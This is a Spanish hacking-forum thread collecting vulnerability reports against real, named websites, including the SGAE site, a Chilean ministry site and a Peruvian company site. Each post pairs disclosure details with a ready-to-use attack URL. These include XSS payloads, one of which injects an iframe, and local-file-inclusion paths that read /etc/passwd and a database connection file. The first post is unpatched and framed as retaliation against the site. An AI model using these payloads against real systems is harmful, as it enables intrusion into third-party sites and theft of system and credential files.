Autor
|
Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection (Leído 88,365 veces)
|
dimitrix
|
Sitio web: www.sgae.esDescubridor: Dimitrix URL del aviso: http://seguridad.dimitrix.es/index.php/2009/12/18/xss-en-la-sgae-pero-que-penita/Fecha de descubrimiento: 18/12/09 Fecha de notificación: 18/12/09 Fecha de publicación: 18/12/09 Arreglado: No Información adicional: Bueno, como ya sabreis la SGAE ha creado una lista con 200 webs que ellos opinan "Ilegales" que quieren cerrar sin órden judicial, y bueno como no tienen muchos cojones no la han publicado, pero como supongo que por cojones mi web (no la pongo por no hacer SPAM) está ahí, pues he decidido darle las gracias cambiando los colorines de su web: http://www.sgae.es/jsp/email-es.jsp?link=[XSS]
|
|
|
En línea
|
|
|
|
|
Ari Slash
|
Sitio web: http://www.minagri.gob.cl/Descubridor: Ari-Slash URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-minagri-gob-cl/Fecha de descubrimiento: 16 de enero de 2010 Fecha de notificación: 16 de enero de 2010 Fecha de publicación: 16 de enero de 2010 Arreglado: si 18 de enero de 2010 (ni siquiera un gracias ¬¬ ) Vulnerabilidad: LFI http://www.minagri.gob.cl/tips/descargar.php?file=../include/php/conectaBD.php http://www.minagri.gob.cl/tips/descargar.php?file=../../../../etc/passwd
Vulnerabilidad: XSS http://www.minagri.gob.cl/buscar.php?txt_busca=d%22%3E%3Ciframe%20src=http://skydrive.cl/foro%3E%3C/iframe%3E%3C saludos
|
|
« Última modificación: 21 Enero 2010, 07:53 am por Ari-Slash »
|
En línea
|
|
|
|
Ari Slash
|
Sitio web: lostambos.com.pe Descubridor: Ari-Slash y el-pollo URL del aviso: http://h4ckvi505.wordpress.com/2010/01/21/vulnerabilidad-en-lostambos-com-pe/Fecha de descubrimiento: 17 de enero de 2010 Fecha de notificación: 17 de enero de 2010 Fecha de publicación: 17 de enero de 2010 Arreglado: Si 18 de Enero de 2010 (eliminaron el arhcivo download.php xD) Vulnerabilidad: LFI http://www.lostambos.com.pe/download.php?f=../ saludos
|
|
« Última modificación: 24 Septiembre 2010, 17:51 pm por Ari-Slash »
|
En línea
|
|
|
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Recopilatorio de C#
.NET (C#, VB.NET, ASP)
|
/* strcpy() */
|
3
|
8,406
|
5 Junio 2007, 17:50 pm
por piroman
|
|
|
Como hacer update en SQLinjection
Nivel Web
|
BlackHKR
|
6
|
6,485
|
12 Mayo 2010, 20:55 pm
por BHK
|
|
|
Duda SQLinjection en information_schema
« 1 2 »
Nivel Web
|
miguelskk
|
10
|
8,517
|
17 Julio 2010, 01:46 am
por TapIt
|
|
|
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking
|
NetStorm
|
1
|
3,824
|
5 Octubre 2011, 00:06 am
por alpha015
|
|
|
SQLInjection sin acceso a information_schema
Nivel Web
|
buggy_man
|
3
|
3,281
|
11 Agosto 2012, 07:17 am
por afdlkglfgfdgfhgf
|
|